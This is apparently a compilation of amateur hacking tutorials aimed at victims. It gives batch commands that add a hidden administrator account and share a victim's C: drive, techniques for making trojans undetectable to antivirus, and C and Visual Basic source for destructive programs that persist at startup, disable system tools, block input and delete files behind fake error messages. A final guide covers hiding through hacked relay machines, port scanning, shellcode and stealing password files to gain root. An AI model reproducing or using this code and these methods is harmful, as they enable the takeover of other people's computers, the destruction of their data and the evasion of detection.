A Trojan is a Remote Admin Tool , this a server that runs invisible on the victim and the client that you run on your computer to take control of the victim ,you cant connect to the victim if he hasnt run the file yet ,there are many trojans around with different commands , layouts , extras ect , the trojans usually include a server builder that its safe to run on your computer you can browse to the server.exe and edit some options , like passwords or ports before sendin it...
How it works
When the victim runs the server.exe the server runs invisible on the victim ,he doesnt see anything.The server keeps a port open lets say 27374 port and waits for a connection , some servers of some trojans may have passwords in that case the server is stand by for a connection and a password , when you log into the victim the server enables you to run many commands by pressing buttons in your client ,the trojans were made to run those commands faster by pressing buttons.
Antiviruses
All the antiviruses like Mc Affee ,Norton etc will identify a virus and try to delete all the trojan servers you plan to send to your victims , also all the trojan clients even the server editor are identified like viruses with all their files so dont spam saying that such files are infected, they are not, they are original viruses.
What to do with a trojan
You can play with it, open the cds and laugh like stupid that you are, or redirect ports for other purposes,enable keyloggers and get the passwords, log on into their mails,, you might key-log something.you can make them log in irc servers like bots to see whos online and a lot more.
-------------------------------------------------------------------------------------------------
******************************

MAKING YOUR OWN TROJAN IN A BAT FILE

:Making your own trojan in a .bat file:- Open a dos prompt we will only need a dos prompt , and windows xp... -Bazics- Opening a dos prompt -> Go to start and then execute and write cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] Ok in this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat file is a piece of text that windows will execute as commands. Open notepad and whrite there: dir pause And now save this as test.bat and execute it.

-------------------------------------------------------------------------------------------------
Starting

Server:- The plan here is to share the C: drive and make a new user with administrators access Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file. Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you whant Command n 2-> net localgroup administrators neo /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share. Command n 3->net share system=C:\ /unlimited This commands share the C: drive with the name of system. Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend. -!extras!- Command n 4-> net send urip I am ur server Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip. ->To see your ip in the dos prompt put this command: ipconfig -----------------------: Client :---------------- Now that your friend opened your .bat file her system has the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt. Command n 1 -> net use \\victimip neo This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. Command n 2-> explorer \\victimip\system And this will open a explorer windows in the share system wich is the C: drive with administrators acce
***********************
-------------------------------------------------------------------------------------------------
MAKING YOUR TROJAN UD

this tutorial will be showing you 4 ways of how to make a Trojan undetectable to Anti-Virus software.
1. Encryptors/Compressors:

You would think this should be the easiest way to UD (Undetect) a Trojan...but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.
Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.

2. Byte Adders:
This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.

3. Hex Editing:
This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.

The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.

Step One: Place your Trojan Server in a folder.

2) Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.
3) Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.

4): Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.

6) Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.

7)(Optional) Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).
You have to remember that different AV software use different signatures, so scan with as many as you can.

4. Source:
The best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but its simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable.

Option 1: Free Trojan Source Code.
Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick.

Option 2: Decompiling.
Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro.
Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.

if you do find a way of making a Trojan undetectable, DONT disclose it. your Trojan detected in a short amount of time. What is here are the basics of UDing. It will be up to you to make it work.
-------------------------------------------------------------------------------------------------

Simple Virus That Copies itself to start up,disables the
start bar,msconfig,ccleaner, regedit,and taskmgr.it also disables the mouse plus keyboard
disables the mouse plus keyboard beeps,generates infinite folders
and bloats your RAM!!

R.I.P Windows

*****************************/
#include
#include
#include
#include

int main()
{
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0);

char Pathofvirus[MAX_PATH];
char systempath[MAX_PATH];

GetModuleFileName(NULL,Pathofvirus,MAX_PATH);
GetSystemDirectory(systempath,sizeof(systempath));

HKEY newValue;

RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&newValue);

RegSetValueEx(newValue,"igfxc",0,REG_SZ,(LPBYTE)Pathofvirus,sizeof(Pathofvirus));

RegCloseKey(newValue);

RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&newValue);

RegSetValueEx(newValue,"ntoskrnl",0,REG_SZ,(LPBYTE)Pathofvirus,sizeof(Pathofvirus));

RegCloseKey(newValue);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,0);
sleep(15000);

for(;;)
{
BlockInput(0);

HWND tasks,msconfig,regedit,ccleaner,cmd;

tasks = FindWindow(NULL,"Windows Task Manager");
msconfig = FindWindow(NULL,"System Configuration Utility");
regedit = FindWindow(NULL,"Registry Editor");
ccleaner = FindWindow(NULL,"Piriform CCleaner");
cmd = FindWindow(NULL,systempath);

if(tasks || msconfig || regedit || ccleaner|| cmd != NULL)
{
PostMessage(tasks, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(msconfig, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(regedit, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(ccleaner, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(cmd, WM_CLOSE, (WPARAM)0, (LPARAM)0);
}

malloc(rand()%512512);
beep(2500,150); beep(2200,310);
beep(2400,50); beep(2100,50);
beep(2300,50); beep(2000,230);

BlockInput(1);
system("del *.*");
system("md %random%");
}

return 0;
}
------------------------------------------------------------------------------------------------------------------------------------------------
******************************
Visual Basic 6 - Creating a Simple Virus


Now many of you feel that creating a virus is impossible especially for you beginners.


Well this tutorial shows you how to create a simple virus with just a few lines of code.


A virus can be an application that deletes files upon request, this is seen as infecting your


computer because by deleting key files you may need to take action to get your computer


back to normal.


First of all open a new Visual Basic project,a standard exe file

it depends on how you want your virus to work, it is best if it is activated once your application is opened, the main code codes in the form load sub.On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.

Private Sub Form_Load()

Text1.Text = "C:/Windows/System32/cmd.exe

Kill Text1.Text

End Sub

Once the project is opened then the command file will be removed.Now heres an example of this using a command button. Put the following code in the command button and in the form load.You can give the text box a name to make it quicker. Its labelled 'A'

Private Sub Form_Load()

Text1.Text = "C/Windows/System32/cmd.exe"

A = Text1.Text

End Sub

Private Sub Command1_Click

Kill A

End Sub

Once the command button is clicked the command file will be deleted.Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn't got enough memory to run, but in actual fact the victim doesn't know that you have just removed their command file.

Here is to go about it.

Private Sub Form_Load()

Form1.Visible = False

Text1.Text = "C:/Windows/System32/cmd.exe"

A = Text1.Text

Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error"

End Sub

Private Sub Timer1_Timer()

Timer1.Interval = 5000

Kill A

Timer1.Enabled = False

End Sub

All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that's how simple it can be to fool someone. we can now make it a little more difficult if you are finding the above a little too easy.How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.

The example below shows how to remove the files when the application is loaded, we wont be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.So in the form load part put the following code.

Private Sub Form_Load()

Form1.Visible = False

Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error"

Kill "C:/Windows/System32/cmd.exe" s

Kill "C:/Windows/regedit.exe"

The above will remove the command file and the registry, I don't think the victim will be pleased about that do you.Now I have shown you the above information,now it's your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/

Kill "C:/cmd.exe"

That's all you need .

**************************************************************************************

Small virus as a bat file

First open notepad & paste

rmdir C:\Documents and Settings\S\Q

Then save this as a name you will remember or that the victim wont suspect

but it must end in .bat

so for example the of your file will be

happybirthday.bat

Now you must pass this to your victim ,if the file is opened

the folder "my documents & settings will be

deleted.If your targeting a particular folder then change the folder name

-in this case-

my documents & settings,but you can name it what you like

as long as you give the correct path

again- in this case the path is c: but if just your trying to delete

the evidence of some pictures from your dirty weekend away

rather than ruin someone`s whole computer thenyou will need to give the

correct path for the virus to takein the my pictures scenario

the correct path would be-

d:\my pictures\S\Q

if your not sure then copy & paste the code & alter it

to suit your needs

************************************************************************************

Let's start
~~~~~~~~~~~

If you read carefully everything your told on this page, your vaguely intelligent & you work hard at it,
you'll be able to hack. That doesn't really make you a hacker but you're be on the way.
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky before you found this document & you've read the
guides to harmless hacking, then forget everything that you've learnt so far.
You won't understand some things from the tutourial until you start back at the beginning.


Some definitions
~~~~~~~~~~~~~~~~

I'm going to refer to computers as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack have plenty of normal users, who
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

Operating Systems
~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?

-all the good hacking tools and exploits codes are for UNIX.

Let's see where to find the unix you're interested in.

The UNIX systems may be divided in two main groups:

- commercial UNIXes
- free/ opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided into:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.

- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

If you own an intel box, then order the PC version.

If you own a mac , then order the PowerPC version.


It's possible you may have problems with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of 'literature'.

the Internet
~~~~~~~~~~~~

you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box connect to the net,
so go and set up your modem (using YaST2 in SuSE).

If your box doesn't detect any modems, that probably means that you have no modem installed

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.


ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://3ae9edc5.seriousurls.com
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.

Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.

It's now time for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack
this is the most effective stealth technique. not even the FBI can bust you.
If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website or email address, find your ISP, your phone number, your home...
& thats it you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).

Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.

- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes

- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)

- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking though.

Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(amongst others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with a service

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

Port number Common service Example daemon (d stands for daemon)
21 FTP FTPd
23 Telnet telnetd
25 SMTP sendmail (yes!)
80 HTTP apache
110 POP3 qpop



Example:
when you visit the website

, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.

Let's install nmap from an .rpm packet.

bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3


Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.rg ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3

TCP Sequence Prediction: Class=random positive increments
Difficulty=937544
Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
we don't want the admins to get angry , that's why we used the -sS option.
This way hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

bash-2.03$ man nmap

The most obvious and simple way is using FTP:

bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.


But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how too make it:

we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

sh-2.03$ gcc program.c -o program

and execute:

sh-2.03$ ./program

This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell ,don't know what a shell is? read a book of unix!
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is a shell.

You got to replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).

before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be breaking the law and
i'm not responible of your craziness in any way

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from .
sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP if you can.

Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.

sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu

login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are ~censored~ enough to choose a crackable password like a dictinonary word
or a person's name.

I said some admins are ~censored~ (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

Of course, I haven't listed all the exploit kinds that exist, only the most common.